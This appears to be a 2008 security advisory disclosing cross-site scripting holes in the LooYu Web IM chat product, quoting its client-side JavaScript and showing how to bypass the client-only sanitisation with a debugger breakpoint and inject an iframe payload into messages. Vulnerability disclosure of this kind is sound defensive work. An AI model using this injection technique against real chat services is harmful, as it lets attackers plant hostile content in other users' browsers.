Application: LooYu Web IM Vendor: www.looyu.com Corporation: DuoYou, Inc. Version: Latest: (19 SEP 2008) - Home Edition, Enterprise & Professional Description: LooYu Web IM 2008 Cross-Site Scripting Vulnerabilities Background: ============== LooYu is a web-based group chat tool that lets invite a client, colleague, or vendor to chat, and collaborate. Vulnerability: ============== They do not properly sanitize the potentially malicious input content to be rendered and, as a result, an attacker might provide malicious HTML content as part of an IM message. There is a client-side only input validation. Exploit: ============== 1. newVisitorChat.js (1)function sendMessage() { .................. .................. save_message(replaceHtml(msg)); } (2)function save_message(msg) { var m = msg; //BREAKPOINT for(var e in emots){ if(m.indexOf(e)!=-1){ m = m.replace(e,emots[e]); } } addMsg_chat(m, "you"/*getShortId(visitorId)*/, "visitor",null,'send'); .................. .................. } SET BREAKPOINT(firebug, etc), AND SET NEW VALUE: msg = "<iframe width=800 height=600 src='htTP://WWW.G.CN'></iframe>" 2. newCusChat.js (1)function sendMessage() { .................. .................. save_message(replaceHtml(msg)); .................. .................. } (2)function saveMessage(msg) { showLocalMessage(msg); Chat.addMessage(companyId,currentVisitor.chatId,customerId,currentVisitor.getTar(), msg,{callback:function(m){ save_message_do(currentVisitor,m); //BREAKPOINT }}); } SET BREAKPOINT(firebug, etc), AND SET NEW VALUE: msg = "<iframe width=800 height=600 src='htTP://WWW.G.CN'></iframe>" ========================= xisigr[topsec] xisigr@xxxxxxxxx -- ----xisigr----